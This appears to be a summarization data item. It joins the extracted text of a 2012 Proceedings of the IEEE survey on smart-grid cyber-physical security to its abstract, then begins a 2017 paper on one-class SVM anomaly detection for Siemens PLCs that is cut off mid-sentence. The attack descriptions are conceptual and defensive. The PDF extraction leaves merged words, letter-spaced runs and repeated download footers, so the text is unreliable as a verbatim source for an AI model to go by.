jammedby flooding the network with spurious packets.This will result in the loss of critical informationexchange and thus affect long-term and dynamiccontrol capabilities. 2) Desynchronization (ti ming-based attacks): The control algorithms employed by CFDs are time dependent and require strict synchronization. Anattack of this kind could disrupt steady operationof CFDs. 3) Data injection attacks: This type of attacks re- quires an understanding of the communicationprotocol. The attack could be used to send in-correct operational data such as status and control information. This may result in unnecessary VAR compensation and in unstable operating condi-tions. Attack templates of this type were imple-mented on the IEEE 9-bus system and the resultsare presented in [33]. 3) Wide-Area Monitoring Systems: PMU-based wide-area measurement systems are curre ntly being installed in the United States and other parts of the world. The phase angles of voltage phasors measured by PMUs directly helpin the computation of real power flows in the network, andcould thus assist in decision ma king at the control center. PMU-based control applications are yet to be used for real-time control. However, Phadke and Thorp [34] identifycontrol applications that could be enhanced by using dataSridhar et al. : Cyber Physical System Security for the Electric Power Grid Vol. 100, No. 1, January 2012 | Proceedings of the IEEE 215 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:24 UTC from IEEE Xplore. Restrictions apply. provided by PMUs. It is suggested that HVDC systems, centralized excitation systems, FACTS controllers, and power system stabilizers could benefit from wide-areaPMU measurements. PMUs use global positioning system (GPS) technology to accurately timestamp phasor measurements. Thus, thephase difference between voltages on either end of atransmission line, at a given instant, can be accuratelymeasured by using this technology. Phasor data concen- trators combine data from multiple PMUs and provide a time-aligned data set for a particular region to the controlcenter. The North American SynchroPhasor Initiative(NASPInet) [35] effort aims to develop a wide-area com-munications infrastructure to support this PMU operation.It is recognized that PMU-based control applications willbe operational within the next five years. Hence, a secureand dependable WAN backbone becomes critical to power system stability. C. Distribution Control and Security The distribution system is responsible for delivering power to the customer. With the emergence of the smartgrid, additional control loops that enable direct control ofload at the end user level are becoming common. Thissection identifies key controls that help achieve this. Fig. 6identifies communication pro tocols and other parameters for key control loops in the distribution system. 1) Load Shedding: Load shedding schemes are useful in preventing a system collapse during emergency operatingconditions. These schemes can be classified into proactive,reactive, and manual. Active and proactive schemes areautomatic load shedding schemes that operate with thehelp of relays. For example, in cases where the system generation is insufficient to match up to the load, auto- matic load shedding schemes c ould be employed to main- tain system frequency within safe operating limits andprotect the equipment connected to the system. When theneed arises, load is shed by a utility at the distribution levelby the under-frequency relays connected to the distribu-tion feeder. a) Cyber vulnerabilities and solutions: Modern relays are Internet protocol (IP) ready and support communica- tion protocols such as IEC 61850. An attack on the relaycommunication infrastructure or a malicious change to the control logic could result in unscheduled tripping of dis- tribution feeders, leaving load segments unserved. Theoutage that occurred in Tempe, AZ, in 2007, is an exampleof how an improperly configured load-shedding program canresult in large-scale load shedding [36]. The distribution load-shedding program of the Salt River Project was unexpectedlyactivated resulting in the opening of 141 breakers and a loss of399 MW. The outage lasted 46 min and affected 98 700 customers. Though the incident occurred due to a poor configuration management by the employees, it goes on toshow the impact an adversary can cause if a substation issuccessfully intruded. 2) AMI and Demand Side Management: Future distribu- tions systems will rely heavily on AMI to increase reliabi-lity, incorporate renewable energy, and provide consumers with granular consumption monitoring. AMI primarily relies on the deployment of Bsmart meters [at consumer s locations to provide real-time meter readings. Smart me-ters provide utilities with the ability to implement loadcontrol switching (LCS) to disable consumer devices whendemand spikes. Additionally, demand side management[37] introduces a cyber physical connection between themetering cyber infrastructure and power provided to con- sumers. The meter s current configuration is controlled by a meter data management system (MDMS) which liesunder utility control. The MDMS connects to an AMIheadend device which forwar ds commands and aggregates data collected from the meters throughout the infrastruc-ture [38]. Networking within the AMI infrastructure willlikely rely on many different technologies including RFmesh, WiMax, WiFi, and power line carrier. Application layer protocols such as C12.22 or IEC 61850 will be uti- lized to transmit both electricity usage and meter controloperations between the meters and the MDMS. Fig. 7provides an overview of the control flows that could impactconsumer power availability. a) Cyber vulnerabilities and solutions: The smart me- ters at consumer locations also introduce cyber physicalconcerns. Control over whether the meter is enabled or disabled and the ability to remotely disable devices through load control switching provide potential threats fromattackers. Adding additional security into these functions Fig. 6. Distribution control classification.Sridhar et al. : Cyber Physical System Security for the Electric Power Grid 216 Proceedings of the IEEE | Vol. 100, No. 1, January 2012 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:24 UTC from IEEE Xplore. Restrictions apply. presents interesting challenges. A malicious meter disabling command can likely be prevented through the use of time-wait periods [39]. Since meter disabling does not require areal-time response, meters could be programmed to waitsome time after receive a command before disabling thedevice. This prevention would only address remote attacks asthe prevention logic could be bypassed if an attackercompromises the meter. Malicious LCS commands could provide a greater challenge due to more strict temporal requirements. IV.SUPPORTING INFRASTRUCTURE SECURITY The development of a secure supporting infrastructure is necessary to ensure information is accurately stored andtransmitted to the appropriate applications. While thesupporting infrastructure may share some common pro-perties with traditional IT syst ems, the variation is signifi- cant enough to introduce numerous unique and challenging security concerns [9]. Specific properties include: long system lifecycles ( >10 years); limited physical environment protection; restricted updating/change management capabilities; heavy dependency on legacy systems/protocols; limited information processing abilities. A secure information system traditionally enforces the confidentiality of its data to protect against unauthorized access while ensuring its integrity remains intact. In addi- tion, the system must provide sufficient availability of information to authorized users. The primary goal of any cyber physical system is to provide efficient control oversome physical process. This naturally prioritizes informa-tion integrity and availability to ensure control stateclosely mirrors the physical system state. Security mecha- nisms such as cryptography, access control, and authen- tication are necessary to provide integrity in systems,however, all security mechanism tailored for this environ-ment must also provide sufficient availability. This con-straint often limits the utilization of security mechanismswhich fail-closed as they may deny access to a criticalfunction.The development of a trustworthy electric grid requires a thorough reevaluation of the supporting technologies toensure they appropriately achieve the grid s unique re- quirements. The remainder of this section will addressrequired security concerns within the supporting infra-structure and provide a review of current research effortsaddressing these concerns. While there are a vast numberof research areas within this domain, this paper will focus on areas with active security research tailoring to the smart grid s supporting infrastructure. A. Secure Communication Power applications require a secure communications infrastructure to cope with the grid s geographic disperseresources. Data transmission often utilizes wireless com-munication, dialup, and leas ed lines which provide in- creased physical exposure and introduces additional risk.The grid is also heavily reliant on its own set of higher levelcontrol system protocols, including Modbus, DNP3, IEC61850, and ICCP. Often these protocols were not dev- eloped to be attack resilient and lack sufficient security mechanism. This section will detail how encryption, au-thentication, and access control can be added to currentcommunications to provide increased security. 1) Encryption: Retrofitting communication protocols to provide additional security is necessary for their continueduse within untrusted spaces. Often this level of security can be obtained by deploying encrypted virtual private networks (VPNs) that protect network traffic throughencapsulation within a cryptographic protocol [9]. Unfor-tunately, this solution is not always feasible as the industryis fairly dependent on non-IP networks. In addition, strictavailability requirements may not be able to handle theadded latency produced by a VPN. Research into bump-in-the-wire (BITW) encryption hardware attempts to ensure that messages can be appro- priately encrypted and authenticated while limiting thelatency appended by the solution. Work by Tsang andSmith provides a BITW encryption method that signifi-cantly reduces the latency through the reduction of mes-sage hold-back during the encryption and authentication[40]. Additional research has focused on retrofitting old Fig. 7. Control functions within AMI.Sridhar et al. : Cyber Physical System Security for the Electric Power Grid Vol. 100, No. 1, January 2012 | Proceedings of the IEEE 217 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:24 UTC from IEEE Xplore. Restrictions apply. protocols with appropriate security properties. Numerous efforts have addressed the modification of traditional SCADA protocols such as ICCP, DNP3, and Modbus to provideadditional security while maintaining integration withcurrent systems [41] [43]. Deployment and key manage-ment activities still provide difficulties within geographicallydisperse environments. 2) Authentication: Secure remote authentication pre- sents a challenge due to the lengthy deployments and li- mited change management cap abilities. Authentication credentials (e.g., keys and passwords) exposure increasesthroughout their lifetime and protocols become increas-ingly prone to attack due to continual security reviews andcryptanalysis advancements. The development of strong,adaptive, and highly availabl e authentication mechanisms is imperative to prevent unauthorized access. Research by Khurana, et al. has defined design princi- ples required for authentication protocols within the grid[44]. By defining authentication principles, future systemdesigners can ensure their systems achieve the efficiencyand adaptability required for continued secure use.Additionally, research into more flexible authenticationprotocols has been proposed by Chakravarthy to provideadaptability to long deployments [45]. The proposed pro- tocol provides re-keying and remoduling algorithms to protect against key compromises and future authenticationmodule vulnerabilities. 3) Access Control: While encryption and authentication can deter external attackers, they do little to prevent againstinsider threats or attackers that have already gained some internal access. Attackers with access to a communication network may be able to leverage various protocol functionality to inject malicious commands into controlfunctions. The likelihood of a successful attack could besignificantly reduced by appropriately configuring softwareand protocol usage to disable unnecessary functionality. Evaluating industry protocols to identify potentially malicious functions is imperative to ensuring secure sys-tem configurations. Work by Mander dissects the DNP3 protocol detailing the function codes and data objects that would be useful for attackers to access data, control, orimpact the availability of a remote DNP3 master [46]. Thisresearch provides a foundation for understanding thelikely physical impact from a compromised communica-tion channel. Additional research in this domain modelsfeasible attacks against a control systems based on thecurrent protocol specification [47]. More sophisticated protocols targeted for smart grid use, such as ANSI C.12.22 and IEC 61850, require additional analysis to ensure se-cure implementation in new system deployments. B. Device Security Embedded systems are used throughout the grid to support monitoring and control functions. The criticalrole placed on these devices introduces significant cyber- security concerns due to their placement in physically unprotected environments. Large-scale deployments ofembedded devices also incentivizes the use of marginallycheaper hardware leaving little computational capacity tosupport various security functions such as malware or in-trusion monitoring. This also stymies the ability to producethe amount of entropy required to create secure crypto-graphic keys [48]. The development of secure computation within embedded platforms provides a key challenge throughout CPSs. 1) Remote Attestation: Smart meters provide one parti- cularly concerning utilization of embedded systems due totheir expansive deployment s and impact to consumers. Research into the development of remotely attestablesmart meters has suggested that a small static kernel can be used to cryptographically sign loaded firmware [49]. This resulting signature can then be sent as a response to attes-tation queries to verify meters have not been corrupted. Bya l s op r o v i d i n gs u p p o r tf o rr e m o t ef i r m w a r eu p d a t e st h ekernel can allow future reconfiguration of the deviceswhile still providing a trusted platform. Unfortunately,these security mechanisms may still remain vulnerable toadditional attack vectors [50]. Embedded devices also play important roles in the bulk power system. Intelligent electronic devices (IEDs) utilizeembedded devices to control relays throughout the grid. Recent events have shown these devices can be maliciouslyreprogrammed to usurp intended control functions [5].The development of improved attestation mechanismswill play a critical role in the cybersecurity enhancementof the grid. C. Security Management and Awareness An increased awareness of security risk and appropri- ately managing security relevant information provides anequally important role in maintaining a trusted infrastruc-ture. This section will address a range of security activitiesand tools including digital fore nsics and security incident/ event management. 1) Digital Forensics: The ability to perform accurate digital forensics within the electric grid is imperative to identifysecurity failures and preventing future incidents. Strongforensic capabilities are also necessary during event inves-tigation to determine the cause or extent of damage from anattack. While forensic analysis on traditional IT systems iswell researched, the large number of embedded systems and legacy devices within the grid provides new challenges. Research efforts by Chandia et al. have proposed the deployment of Bforensic agents [throughout the cyber infrastructure to collect data about potential attacks [51].Information collected by these agents can then be prio-ritized based on their ability to negatively affect gridoperations.Sridhar et al. : Cyber Physical System Security for the Electric Power Grid 218 Proceedings of the IEEE | Vol. 100, No. 1, January 2012 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:24 UTC from IEEE Xplore. Restrictions apply. Expanding forensic capabilities within embedded sys- tems including meters and IEDs is necessary to ensure these critical resources maint ain integrity. Additionally, operational systems may not be detached for forensicsanalysis, and research into on line analysis methods should be explored for these instances. 2) Security Incident and Event Management: The devel- opment of technologies to collect and analyze interesting data sources such as system logs, IDS results and network flow information is necessary to ensure data are properlyorganized and prioritized. Briesemeister et al. researched the integration of various cybersecurity data sources within acontrol system and demonstrated its ability to detect attacks[52]. This work also coupled visualization tools to provideoperators with a real-time understanding of network health.Tailoring this technology to provide efficient analysis of the grid will place an impetus on control system alarms as they provide information on potential physical impacts initiatedby cyber attacks. Incidents and events within the smart grid will vary greatly from their IT counterparts, analysis methodsshould be correlated with knowledge of the physical sys-tem to determine anomalies. Aggregation and analysisalgorithms may need tailoring for environments with decreased incident rates due to smaller user bases and segregated networks. D. Cybersecurity Evaluation 1) Cybersecurity Assessment: The grid s security postures should be continually analyzed to ensure it provides ade- q u a t es e c u r i t y .T h es y s t e m sc o m p l e x i t y ,l o n gl i f e s p a n s ,a n d continuously evolving cyber threats present novel attackvectors. The detection and removal of these security issuesshould be addressed specific t o both the power applications and supporting infrastructure. Current research has prima-rily focused on the supporting infrastructure as it maintainsmany similarities with more traditional cyber security test-ing. Methodologies used to perform vulnerability assess- ments and penetration tes ting have raised numerous cybersecurity concerns within the current grid [53], [54]. Smart grid technologies will present increasing inter- domain connectivity, thereby creating a more exposed cy-ber infrastructures and trust dependencies between manydifferent parties. NIST s BGuidelines for Smart Grid Cyber Security [(NISTIR 7628) has proposed more robust set of cybersecurity requirements to ensure the appropriateness of cyber protection mechanism [2]. NIST identifies logical interfaces between systems and parties while assigning acriticality level (e.g., high, m edium, low) for the interface s confidentiality, integrity, and availability requirements.The document then presents a list of necessary controls toprovide an appropriate baseline security for the resultinginterfaces.2) Research Testbeds and Evaluations: Researching cyber physical issues requires the ability to analyze the relationship between the cyber and physical components.Real-world data sets containing system architecture, powerflows, and communication payloads are currently unavail-able. Without these data researchers are unable to produceaccurate solutions to modern problems. Increased collab-oration between government, industry, and academia isrequired to produce useful data which can facilitate needed research. While SCADA testbeds provide a founda- tional tool for the basis of cyber physical research, ensur-ing that system parameters closely represent real-worldsystems remains a challenge. The development of SCADA testbeds provides critical resources to facilitate research within this domain. TheNational SCADA Test Bed (NSTB) hosted at Idaho Na-tional Laboratory provides a real-world test environment employing real bulk power system components and control software [55]. Resulting NSTB research has resulted in thediscovery of multiple cyber vulnerabilities [56]. While thisprovides an optimal test environment, the cost is imprac-tical for many research efforts. Work done by SandiaNational Laboratory has utilized a simulation-based test-bed allowing the incorporation of both physical and virtualcomponents. The virtual control system environment (VCSE) allows the integration of various different power system simulators into a simulated network environmentand industry standard control system software [57]. Acade-mic efforts at Iowa State University and the University ofIllinois at Urbana-Champaign provide similar environ-ments [58], [59]. E. Intrusion Tolerance W h i l ea t t e m p t st op r e v e n ti n t r u s i o n sa r ei m p e r a t i v et o the development of a robust cyber infrastructure, failuresin prevention techniques will likely occur. The ability to detect and tolerate intrusions is necessary to mitigate thenegative effects from a successful attack. 1) Intrusion Detection Systems: The successful utilization of intrusion detection in the IT domain suggests it may also provide an important component in smart grid systems.Research by Cheung et al. has leveraged salient control system network properties into a basis for IDS technology[60]. Common data values, pr otocols functions, and com- munication endpoints were modeled by the IDS such thatall violating packets could be flagged as malicious. While the previous research provides unique detection capabilities, an attacker may still be able to create packets which closely resemble normal communications. For ex-ample, a command to trip a breaker cannot be flagged asmalicious since it is a commonly used control function.Producing grid-aware intrusion detection will require abuilt-in understanding of grid functions. Work by Jin et al. shows how basic power flow laws leveraging BayesianSridhar et al. : Cyber Physical System Security for the Electric Power Grid Vol. 100, No. 1, January 2012 | Proceedings of the IEEE 219 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:24 UTC from IEEE Xplore. Restrictions apply. reasoning can help reduce false positives by exhibiting a real-world understanding of the system [61]. The transition to smart grid technologies will likely reduce the number of IDS affable qualities compared totraditional SCADA communications. Performing intrusiondetection in such a complex environment will requiren o v e ld a t ac o l l e c t i o nm e c h a n i s m sa sw e l la st h ea b i l i t yt odetect and aggregate attack indicators across multiplenetwork domains [62]. 2) Tolerant Architectures: Intrusion tolerance mechan- isms have recently have gained increased attention as amethod to ensure a system s abi lity to operate effectively during an attack. Research within the Crutial projectattempts to explore both proactive and reactive mechan-isms to prevent cyber attacks from impacting the system sintegrity [63]. This research explores a Byzantine tolerant protection paradigm which assures correct operations as long as no more than fout of 3 f 1 components are attacked. Extended research within in trusion tolerance should incorporate the smart grid specific availability require-ments and infrastructure designs. Traditional models re-laying on Byzantine fault/intrusion tolerance mechanismpresent significant cost and may not be practical within the smart grid. Future designs can leverage known physical system redundancies and recovery capabilities to assistwith traditional intrusion/fault tolerance design models. V.EMERGING RESEARCH CHALLENGES As smart grid technologies become more prevalent, future research efforts must target a new set of cybersecurity concerns. This section documents emerging research chal- lenges within this domain. A. Risk Modeling The risk modeling methodology and subsequent risk index should capture both, the vulnerability of cyber net-works in the smart grid and the potential impacts an ad-versary could inflict by exploiting these vulnerabilities. The cyber vulnerability assessment plan in risk modeling should be thorough. It should include allsophisticated cyber-attack scenarios such as elec-tronic intrusions, DoS, data integrity attacks, tim-ing attacks, and coordinated cyber attacks. Thetests should be conducted on different vendorssolutions and configurations. The impact analysis should include dynamics intro- duced by new power system components and asso- ciated control, along with existing ones. Theanalyses must check to see if any power systemstability limits are violated for different attacktemplates. For example, current wind generationturbines offer uneconomical frequency control anddo not contribute to system inertia. Hence, attackscenarios should include attacks on the system during high wind penetration. Managing exposure from increased attacks surfaces due to the inclusion of the AMI and MDMS infra-structures, widespread communication links todistribution control centers, and potentially trans-mission and generation control centers. Impactstudies should include attack vectors that targetsuch devices and evaluate system stability. B. Risk Mitigation Algorithms As in the case of risk modeling, risk mitigation must include solutions at both the cyber and power system level.Consider the following attack scenario. One fundamental vision of the smart grid is to allow controllability of do-mestic devices by utilities to help reduce costs. If an adversary intrudes into the AMI network of a neighbor- hood to turn on large chunks of load when they are expected to be turned off, the system could experiencesevere stability problems. Cyber defense mechanisms thatare able to detect/prevent such an attack, and powersystem defense mechanisms that ensure stable operationin the event of an attack, should be developed. Attack resilient control provides defense in depth to a CPS. In addition to dedicated cybersecurity soft- ware and hardware, robust control algorithms enhance security by providing security at the ap-plication layer. Measurements and other data ob-tained through the SCADA and emerging wide-areamonitoring systems have to be analyzed to detectthe presence of anomalies. For example, anapplication should first check if the obtainedmeasurement lies within an acceptable range and reject the ones that do not comply. However, a smart attacker could develop attack templates thatsatisfy these criteria and force the operator intotaking wrong control actions. Hence, additionaltests that are based on forecasts, historical data andengineering sense should be devised to ascertainthe current state of the system. An attack might not be successful if the malicious measurements do not conform to the dynamics of the system. In most cases, the physical parametersof the system (e.g., generator constants) are pro-tected by utilities. These parameters play a part indetermining the state of the system and systemresponse to an event. Hence, algorithms that incor-porate such checks could help in identifying mali-cious data when an attacker attempts to mislead the operator into executing incorrect commands. Intelligent power system control algorithms that are able to keep the system within stability limits dur-ing contingencies are cri tical. Additionally, the development of enhanced power management sys-tems capable of addressing high-impact contingen-cy scenarios is necessary.Sridhar et al. : Cyber Physical System Security for the Electric Power Grid 220 Proceedings of the IEEE | Vol. 100, No. 1, January 2012 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:24 UTC from IEEE Xplore. Restrictions apply. Domain-specific anomaly detection and intrusion tolerance algorithms that are able to classify mea- surements and commands as good/bad are key. Inaddition, built-in intelligence is required so thatdevices can respond appropriately to anomalysituations. C. Coordinated Attack Defense The power system, in most cases, is operated at (N-1) contingency condition and can inherently counter attacks that are targeted at single components. This means, theeffect from the loss of a single transmission line can benegated by rerouting power through alternate lines. How-ever, the system was not designed to fend against attacksthat target multiple components. Such coordinated at-tacks, when carefully structured and executed, can pushthe system outside the protection zone. The increased at- tack surface introduced by the smart grid provides an opening for an adversary to plan such attacks. The North American Electric Reliability Corporation (NERC) has instituted the Cyber Attack Task Force(CATF) to gauge system risk from such attacks and de-velop feasible, and cost-effective mitigation techniques[64]. Future mitigation strategies include the following. Risk modeling and mitigation of coordinated attacks is key to preventing the occurrence of attacks. Attack detection tools that monitor traffic andsimultaneously correlate events at multiple sub-stations could help in early identification of coordi-nated attack scenarios. Future power system planning and reliability studies should accommodate coordinated attack scenariosin its scope. Strategic enhancements to the power system infrastructure could help the system operate within stability limits during suchscenarios. D. AMI Security Geographically distribute d architectures with high availability requirements present numerous security andprivacy concerns. Specific research challenges with AMI include: remote attestation of AMI components and tamper detection mechanisms to prevent metermanipulations; exploration of security failures due to common modal failures (e.g., propagating malware, re-motely exploitable vulnerabilities, sharedauthenticators); model-based anomaly methods to determine attacks based on known usage patterns and fraud/attackdetection algorithms; security versus privacy tradeoffs including inference capabilities of consumer habits, anonymizationmechanisms, anonymity concerns from both data-at-rest and data-in-motion perspectives.Numerous additional privacy concerns have been raised within the smart grid; NIST has provided a more com- prehensive review of these concerns [2]. E. Trust Management The dynamic nature for the smart grid will require complex notions of trust to evaluated the acceptability ofsystem inputs/outputs. Dynamic trust distribution with adaptability for evolving threats and likely cybersecurity failures (e.g., exposed authenticator, unpatched systems)and grid emergencies (e.g., cascading failures,natural disasters, personnel issues). Trust management based on data source (e.g., SCADA field device, adjacent utilities) and verifi-cation of trust allocations for low-trust systems(physically unprotected, limited attribution capa- bilities), along with trust verification mechanisms/ algorithms and impact analysis of trust manipula-tion mechanisms. Aggregation of trust with increasing data/ verification sources (e.g., more sensors, correlationswith previous knowledge of grid status) and accu-mulation of trust requirements throughout AMI. F. Attack Attribution Attack attribution will play an important role in deter- rence within the smart grid. Hi gh availability requirements limit the ability to disconnect potential victims within thecontrol network, especially when steeping-stone attackmethods are used. Attribution capabilities within/between controlled networks including AMI, wide area measurement systems, and control networks. Leveraging known information flows, data formats, and packet latencies. Identifying stepping-stone attacks with utility owned/managed infrastructures based on timinganalysis, content inspection, packet marking/logging schemes. Methods to reduce insider threat impacts while maintaining appropriate adaptability in emergency situations such as improved flexibility of autho-rization and authenticatio n or defense-in-depth implementations. G. Data Sets and Validation Research within the smart grid realm requires realistic data and models to assure accurate results and real-world applicability. Data models for SCADA networks, AMI, wide area monitoring networks including communicationprotocols, common information models (CIM),data sources/sinks. Temporal requirements for data (e.g., 4 ms for pro- tective relaying, 1 4 s for SCADA, etc.) and realisticSridhar et al. : Cyber Physical System Security for the Electric Power Grid Vol. 100, No. 1, January 2012 | Proceedings of the IEEE 221 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:24 UTC from IEEE Xplore. Restrictions apply. data sets of control-loop interactions (e.g., AGC, voltage regulation, substation protection schemes). VI.CONCLUSION A reliable smart grid requires a layered protection ap- proach consisting of a cyber infrastructure which limitsadversary access and resilient power applications that areable to function appropriately during an attack. This work provides an overview of smart grid operation, associated cyber infrastructure and power system controls that di-rectly influence the quality and quantity of power deliv-ered to the end user. The paper identifies the importanceof combining both power application security andsupportinginfrastructure security into the risk assessment process and provides a methodology for impact evaluation. A smart grid control classification is i ntroduced to clearly identify communication technologies and control messages re-quired to support these control functions. Next, a review ofcurrent cyber infrastructure security concerns are pre-sented to both identify possible weaknesses and addresscurrent research efforts. Future smart grid research chal-lenges are then highlighted detailing the cyber physical security relationship within this domain. While this work focuses on the smart grid environment, the general appli-cation and infrastructure framework including many of theresearch concerns will also transition to other criticalinfrastructure domains. h
Summary:
|The development of a trustworthy smart grid requires a deeper understanding of potential impacts resulting from successful cyber attacks. Estimating feasible attack impact requires an evaluation of the grid s dependency on itscyber infrastructure and its ability to tolerate potential failures.A further exploration of the cyber physical relationships withinthe smart grid and a specific review of possible attack vectors isnecessary to determine the adequacy of cybersecurity efforts.This paper highlights the significance of cyber infrastructure security in conjunction with power application security to pre- vent, mitigate, and tolerate cyber attacks. A layered approach isintroduced to evaluating risk based on the security of both thephysical power applications and the supporting cyber infra-structure. A classification is presented to highlight dependen-cies between the cyber physical controls required to supportthe smart grid and the communication and computations thatmust be protected from cyber attack. The paper then presents current research efforts aimed at enhancing the smart grid s application and infrastructure security. Finally, current chal-lenges are identified to facilitate future research efforts.
|
Summarize:
Keywords Programming logic controller, forensics, machine learning I. INTRODUCTION Industrial Control System (ICS) system is used to monitor and control industrial and infrastructure processes such as chemical plant and oil refinery operations, electricity generation and distribution, and water management [1]. If any undesirable incidents happened to the systems, it may hazard human s lives, cause serious damage to our environment and enormous financial loss. It is important to protect the systems from any undesired incidents such as hardware failure, malicious intruders, accidents, natural disasters, accidental actions by insiders [5]. Traditionally, the control systems have been operated as isolated systems with no network connection to the world. Threats against these systems were limited to physical damage attacks or data tampering that originated inside the system. Nowadays, such systems are connected to the corporate networks and Internet over TCP/IP and wireless IP for improving performance and effectiveness [2]. As a result, the closed systems have been exposed to various Internet threats and attacks. Programmable Logic Controller (PLC) is an essential component of ICS. It is a special computer, which can be used to construct an automation system (from very simple one to a rather complicated one). An example of a simple automation system is Lighting Control System. The system is used to turn lights on automatically when the area becomes occupied and turn them off when the area becomes unoccupied. On the other hand, a group of PLCs can form a complex automation control system such as power generation system. PLCs in electricity generation system are responsible for automating numerous tasks that keep the electricity flowing to our home, offices and factories [3]. Because of the special architecture of PLC such as limited memory and proprietary operating system, it is difficult to apply contemporary tools and techniques for security protection and digital forensics. This paper proposes to adopt a semi-supervised machine learning algorithm, One-class Support Vector Machine (OCSVM), to detect PLC anomalous events. Although OCSVM has previously been applied successfully to anomaly detection problems such as detecting anomalous Windows registry accesses [25], it seems that it has not been used to detect PLC anomalous behavior. Compared to supervised machine learning, semi-supervised machine learning may be a better solution for PLC anomaly detection (see the followings for more elaboration). In our experiment, we selected a popular PLC, Siemens Simatic S7-1212C, and set up a common critical PLC application: simulated traffic light control system. Anomalous operations of traffic light control system were created in order to prove the effectiveness and accuracy of the methodology. The proposed methodology is an initial step for us to create a generic model to detect anomalous behavior of any PLC and other control programs even with limited domain knowledge of PLC applications. II. P ROGRAMMABLE LOGIC CONTROLLER Programmable Logic Controller (PLC) is a special form of microprocessor-based controller that uses a programmable memory to store instructions and to implement functions such as logic, sequencing, timing, counting and arithmetic in order to control machines and processes (Fig.1) [4]. When designing and implementing control applications, PLC programming is an important task. All PLCs have to be 978-1-5386-0683-4/17/$31.00 2017 IEEE2017 IEEE Conference on Communications and Network Security (CNS): The Network Forensics Workshop 978-1-5386-0683-4/17/$31.00 2017 IEEE 580 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:37 UTC from IEEE Xplore. Restrictions apply. Fig. 1. Programmable Logic Controller loaded with user program to control the status of outputs according to status of inputs. PLC can identify each input and output by address. For Siemens PLC, the inputs and outputs have their addresses in terms of the byte and bit numbers. For example, I0.7 is an input at bit 7 in byte 0 and Q0.7 is an output at bit 7 in byte 0. A PLC generates anomalous operations in the following situations [15]: (i) hardware failure; (ii) incompatible firmware version; (iii) control program bugs created by an authorized programmer or attacker; (iv) stop and start attacks; and (v) memory read and write attacks. In order to detect these kinds of anomalous operations, we do the followings. We first capture relevant values of memory addresses used by PLC control program in normal situation. The captured values are used to train a model for the normal behavior of PLC using the semi-supervised machine learning. The trained model can be used to classify whether the PLC events are in normal operation or not. To demonstrate our proposed methodology, we developed a control program by STEP 7 (Siemens programming software for S7 PLC programming, communication and configuration) for controlling traffic light control system (Fig. 2). A. Traffic Light Control System The setup of a simulated traffic light control system that we used in our experiment is shown in Fig 2. PLC Input I0.0 and I0.1 were connected with switches. PLC Output Q0.0, Q0.1, Q0.5, Q0.6, and Q0.7 were connected with lights. The traffic light control program (TLIGHT) was from the user guide SIEMENS SIMATIC S7-300 Programmable Controller Quick Start [6]. The control system is constructed by a set of instructions which are Inputs, Outputs, Memory Bit, and Timers. The instruction details are listed in Table I [6]. III. C HALLENGES OF PLC PROTECTION AND FORENSICS Traditional tools and techniques are not easy to apply directly to PLCs for security protection and forensic investigation because of its unique architectures, such as special operating systems and limited memory [9]. For example, there is no software can be installed to PLC to prevent and detect malicious software. Followings are PLC forensic challenges [8]: Lack of documentation: Insufficient low-level documentation available for PLC with serious implications for forensic investigations. Lack of domain specific knowledge and experience: There is no comprehensive knowledge for performing PLC forensics. Lack of security mechanisms: No logging systems for security and forensic purposes. Lack of forensic tools: No dedicated forensic tools for PLC to perform a comprehensive investigation. Availability / Always-On: The availability of PLC in ICS environment is always top priority. Therefore, it is not easy to shut down a PLC for forensic investigation. IV. M ACHINE LEARNING Machine learning is a method of data analysis. It builds an automated analytical model by using algorithms to learn from data iteratively. Based on the model, machine learning allows computers to find hidden insights without being explicitly programmed [10]. Supervised learning trains a model on known input and output data so that it can predict future outputs. Unsupervised learning finds hidden patterns or intrinsic structures in input data without knowing the corresponding labels of each input [11]. Semi-supervised learning falls between unsupervised learning (without any labeled training data) and supervised learning (with completely labeled training data) [7]. One-class Support Vector Machine(OCSVM) is a semi-unsupervised algorithm. A. One-class Support Vector Machine (OCSVM) In machine learning, OCSVM is an One-class classification, also known as unary classification, tries to identify objects of a specific class amongst all objects, by learning from a training set containing only the objects of that class [13] (Fig. 3). This paper utilizes OCSVM to train a model using data of normal situations (Training set), and classify PLC anomalous behavior that deviates from the trained model. This approach is suitable to deal with PLC anomalous behavior detection because OCSVM is suitable to deal with large amount of training data, since class labelling is not necessary. Also, it is relatively easy to gather training data of normal situations. On the other side, it is relatively difficult or impossible to collect data with a faulty system state. Even a faulty system state could be simulated, there is unlikely to guarantee that all the faulty state are simulated [12]. Fig. 2. PLC Inputs / Outputs connection with traffic lights 2017 IEEE Conference on Communications and Network Security (CNS): The Network Forensics Workshop 581 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:37 UTC from IEEE Xplore. Restrictions apply. TABLE I. INSTRUCTIONS OF TRAFFIC LIGHT CONTROL SYSTEM Instruction Address Description Outputs Q 0.0 Red for pedestrians Q 0.1 Green for pedestrians Q 0.5 Red for vehicles Q 0.6 Yellow for vehicles Q 0.7 Green for vehicles Inputs I 0.0 Switch on right-hand side of street I 0.1 Switch on left-hand side of street Memory Bit M 0.0 Memory bit for switching the signal after a green request from a pedestrian Timers (on-delay timer) T 2 Duration (3 sec) of yellow phase for vehicles T 3 Duration(10 sec) of green phase for pedestrians T 4 Delay (6 sec) red phase for vehicles T 5 Duration (3 sec) of red/yellow phase for vehicles T 6 Delay (1 sec) next green request for pedestrians Fig. 3. One-class Classification V. LITERATURE REVIEW There are many research works focusing on ICS and PLC security protection and forensics after STUXNET malware attack discovered in 2010. STUXNET s target was to infect Siemens programming device (i.e., PC running Step 7 on Windows environment). The objective of the malware is to reprogram ICS by modifying code on the PLCs to make them work in a manner the attacker intended and to hide those changes from the operator of the equipment [17]. An example is the research work of Jamie et al. [22], they present a new methodology for the development of a transparent expert system for the detection of wind turbine pitch faults utilizing a data-intensive machine learning approach. The expert system for the classification and detection of wind turbine pitch faults, as validated by the 85.50% classification accuracy achieved. Tina Wu and Jason Nurse have proved that 